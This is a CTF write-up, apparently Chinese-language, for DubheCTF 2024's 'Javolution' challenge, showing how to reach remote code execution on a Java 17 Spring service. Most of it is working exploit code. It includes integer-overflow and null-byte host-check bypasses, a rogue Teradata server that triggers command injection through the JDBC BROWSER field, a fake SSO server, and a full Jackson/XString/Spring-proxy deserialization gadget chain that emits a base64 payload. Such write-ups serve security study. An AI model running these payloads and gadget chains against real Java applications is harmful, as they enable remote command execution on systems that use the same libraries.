Javolution
A modern java challenge prepared for u, bypass it and achieve RCE !
源码 https://github.com/H4cking2theGate/My-CTF-Challenges/tree/main/DubheCTF%202024/Javolution
bypass
/pal/cheat修改自己的defense为负数,让opponentPower溢出为负值,打败jetragon
升到50级后,传入localhost%00dubhe绕过host检测
1 2 3 4 5 6 7 8 9
| def levelup(): r = requests.get(url+"/pal/cheat?defense=-800000") print(r.text) r = requests.get(url+"/pal/battle/jetragon") print(r.text)
def deser(): r = requests.post(url+"/pal/cheat?host=localhost%00dubhe", data={"data":mydata}) print(r.text)
|
这里看了wp后收集到的其他几种绕过
1 2 3
| 子域名解析到127.0.0.1 dubhe.localhost ::FFFF:127.0.0.1%dubhe
|
Teradata RCE
参考blackhat,Teradata中可以利用browser字段命令注入绕过jdk17的限制
com.teradata.jdbc.jdbc.GenericTeradataConnection#GenericTeradataConnection作为本题的sink点,调用栈如下
1 2 3 4 5 6 7
| exec:320, Runtime (java.lang) <init>:249, GenericTeradataConnection (com.teradata.jdbc.jdbc) <init>:180, TDSession (com.teradata.jdbc.jdbc_4) createConnection:63, ConnectionFactory (com.teradata.jdbc.jdbc) createConnection:53, ConnectionFactory (com.teradata.jdbc.jdbc) createNewConnection:752, TeraDataSourceBase (com.teradata.jdbc) getConnection:21, TeraDataSource (com.teradata.jdbc)
|
恶意TeradataServer
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53
| import asyncore import logging import socket import struct
class TeradataRequestHandler(asyncore.dispatcher_with_send): def __init__(self, sock, addr, url): asyncore.dispatcher_with_send.__init__(self, sock=sock) self.addr = addr self.packet_to_send = (bytes.fromhex('03020a0000070000')+ struct.pack(">H",len(url)+899)+ bytes.fromhex('000000000000000000000000000000000000000000010000000005ff0000000000000000000000000000002b024e000003e8000003e80078000177ff0000000200000001ff000004be00555446313620202020202020202020202020202020202020202020202020bf00555446382020202020202020202020202020202020202020202020202020ff00415343494920202020202020202020202020202020202020202020202020c0004542434449432020202020202020202020202020202020202020202020204e0100010001540007008c310000640000fa00000f4240000000007cff06000070000000fff80000000100000000bf000000100000ffff000008000000008000000040000009e7000fa0000000f23000007918000000260000fa000000fa000000fa0000007d0000007d000000fa000000fa00000009e7000000060000000600000006000003e8000fa00000fffc00000fffb40000fa000009000101000a001c01010101010101020100010100010101010201010001010101010102000b002201010101010001010101010102010101010101010001010101010101010001010000000c0006010001020101000d003e31372e32302e30332e30392020202020202020202020202020202020202031372e32302e30332e3039202020202020202020202020202020202020202020000e000403030203000f00280100000100010100000101000001000100010001000000000000000000000001010001000100000100100014000000000000000000008002000000000000000000120020010101010101010100000000000000000000000000000000000000000000000000130008010101000000000000060002014900a5')+ struct.pack(">H",len(url)+87)+ bytes.fromhex('0000000100010005010002000811140309000300040004000600210006000400050004000700040008000400090004000a000501000b000501000c000501000e0004001000060100000f')+ struct.pack(">H",len(url)+11)+ bytes.fromhex('000372636500')+ struct.pack("B",len(url))+ url.encode("ascii")+ bytes.fromhex('00a70031000000010000000d2b06010401813f0187740101090010000c00000003000000010011000c000000010000001400a70024000000010000000c2b06010401813f01877401140011000c000000010000004600a7002100000001000000092a864886f7120102020011000c000000010000002800a7001e00000001000000062b06010505020011000c000000010000004100a70025000000010000000d2b0601040181e01a04822e01040011000c000000010000001e00a70025000000010000000d2b0601040181e01a04822e01030011000c000000010000000a')) self.ibuffer = []
def handle_read(self): data = self.recv(8192) if data: logging.info('[+]Data received: {}{}'.format(data,"\r\n")) logging.info('[+]Data sending: {}{}'.format(self.packet_to_send,"\r\n")) self.send(self.packet_to_send)
def handle_close(self): logging.info('[+]Connection closed: {}'.format(self.addr)) self.close()
class TeradataServer(asyncore.dispatcher): def __init__(self, host, port, url): asyncore.dispatcher.__init__(self) self.create_socket(socket.AF_INET, socket.SOCK_STREAM) self.set_reuse_addr() self.bind((host, port)) self.listen(5) logging.info('[+]Listening on {}:{}'.format(host, port)) self.url = url
def handle_accept(self): pair = self.accept() if pair is not None: sock, addr = pair logging.info('[+]Incoming connection from {}'.format(repr(addr))) handler = TeradataRequestHandler(sock, addr, self.url)
if __name__ == '__main__': logging.basicConfig(level=logging.INFO) server = TeradataServer('0.0.0.0', 10250, 'http://127.0.0.1:7777/') asyncore.loop()
|
恶意ssoserver
1 2 3 4 5 6 7 8 9 10 11
| from flask import Flask
app = Flask(__name__)
@app.route("/") @app.route("/.well-known/openid-configuration") def index(): return "{\"authorization_endpoint\": \"1\", \"token_endpoint\": \"1\"}"
if __name__ == "__main__": app.run('0.0.0.0',port=7777)
|
反序列化
触发toString
本题有spring依赖,可以用jackson触发getter,同时BadAttributeValueExpException在jdk17中被改了,没法触发toString,这里换Xstring即可。
收集的wp中还有利用EventListenerList触发toString的链子,参考
1 2 3 4 5 6 7 8
| public static Object makeReadObjectToStringTrigger(Object obj) throws Exception { EventListenerList list = new EventListenerList(); UndoManager manager = new UndoManager(); Vector vector = (Vector) ReflectionHelper.getFieldValue(manager, "edits"); vector.add(obj); ReflectionHelper.setFieldValue(list, "listenerList", new Object[]{InternalError.class, manager}); return list; }
|
稳定调用getter
在TeraDataSourceBase中有些不符合命名规范的getter/setter会让jackson反序列化时报错 Conflicting getter definitions,这里可以用JDK动态代理来解决。
POJONode在反序列化过程中调用的getter顺序不稳定,这是由于getDeclaredMethods获取的Method数组顺序是依据函数地址而不是函数名。参考 https://mp.weixin.qq.com/s/XrAD1Q09mJ-95OXI2KaS9Q
在对TeraDataSource的反序列化过程中,props属性中会出现4个函数,而其中javax.sql.CommonDataSource#getParentLogger这个函数在TeraDataSource的实现里面会抛出异常,如果props中的getConnection排在getParentLogger之前即可成功触发,排在后面会报错,并且不同平台下差异很大,windows下大概率能触发,题目中给了一个PalDataSource来解决这里的问题。
完整exp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119
| package org.example.teratest;
import com.sun.org.apache.xpath.internal.objects.XString; import com.fasterxml.jackson.databind.node.POJONode; import javassist.ClassPool; import javassist.CtClass; import javassist.CtMethod; import org.dubhe.javolution.pool.PalDataSource; import org.springframework.aop.framework.AdvisedSupport; import javax.management.BadAttributeValueExpException; import javax.sql.DataSource; import java.io.ByteArrayOutputStream; import java.io.ObjectOutputStream; import java.lang.reflect.*; import java.util.Base64; import java.util.HashMap;
public class JacksonTera { public static void main(String[] args) throws Exception { String command = "notepad"; PalDataSource dataSource = new PalDataSource(); dataSource.setBROWSER(command); dataSource.setLOGMECH("BROWSER"); dataSource.setDSName("127.0.0.1"); dataSource.setDbsPort("10250"); dataSource.setBROWSER_TIMEOUT("2"); dataSource.getConnection(); Object proxy = getProxy(dataSource, DataSource.class);
Object exp = getXstringMap(proxy); base64Serialize(exp); }
public static Object getProxy(Object obj,Class<?> clazz) throws Exception { AdvisedSupport advisedSupport = new AdvisedSupport(); advisedSupport.setTarget(obj); Constructor constructor = Class.forName("org.springframework.aop.framework.JdkDynamicAopProxy").getConstructor(AdvisedSupport.class); constructor.setAccessible(true); InvocationHandler handler = (InvocationHandler) constructor.newInstance(advisedSupport); Object proxy = Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(), new Class[]{clazz}, handler); return proxy; }
public static Object getBadAttr(Object obj) throws Exception { CtClass ctClass = ClassPool.getDefault().get("com.fasterxml.jackson.databind.node.BaseJsonNode"); CtMethod writeReplace = ctClass.getDeclaredMethod("writeReplace"); ctClass.removeMethod(writeReplace); ctClass.toClass();
POJONode node = new POJONode(obj); BadAttributeValueExpException val = new BadAttributeValueExpException(null); setFieldValue(val, "val", node); return val; }
public static Object getXstringMap(Object obj) throws Exception { CtClass ctClass = ClassPool.getDefault().get("com.fasterxml.jackson.databind.node.BaseJsonNode"); CtMethod writeReplace = ctClass.getDeclaredMethod("writeReplace"); ctClass.removeMethod(writeReplace); ctClass.toClass(); POJONode node = new POJONode(obj);
XString xString = new XString("A.R.");
HashMap<Object, Object> map1 = new HashMap<>(); HashMap<Object, Object> map2 = new HashMap<>(); map1.put("yy", node); map1.put("zZ", xString); map2.put("yy", xString); map2.put("zZ", node); Object o = makeMap(map1, map2);
return o; }
public static HashMap makeMap(Object v1, Object v2) throws Exception { HashMap s = new HashMap(); setFieldValue(s, "size", 2); Class nodeC; try { nodeC = Class.forName("java.util.HashMap$Node"); } catch (ClassNotFoundException e) { nodeC = Class.forName("java.util.HashMap$Entry"); } Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC); nodeCons.setAccessible(true);
Object tbl = Array.newInstance(nodeC, 2); Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null)); Array.set(tbl, 1, nodeCons.newInstance(0, v2, v2, null)); setFieldValue(s, "table", tbl); return s; }
public static String base64Serialize(Object obj) throws Exception {
ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(); ObjectOutputStream oos = new ObjectOutputStream(byteArrayOutputStream); oos.writeObject(obj); String payload = Base64.getEncoder().encodeToString(byteArrayOutputStream.toByteArray()); System.out.println(payload); return payload; }
public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { Class<?> clazz = obj.getClass(); Field field = clazz.getDeclaredField(fieldName); field.setAccessible(true); field.set(obj, value); } }
|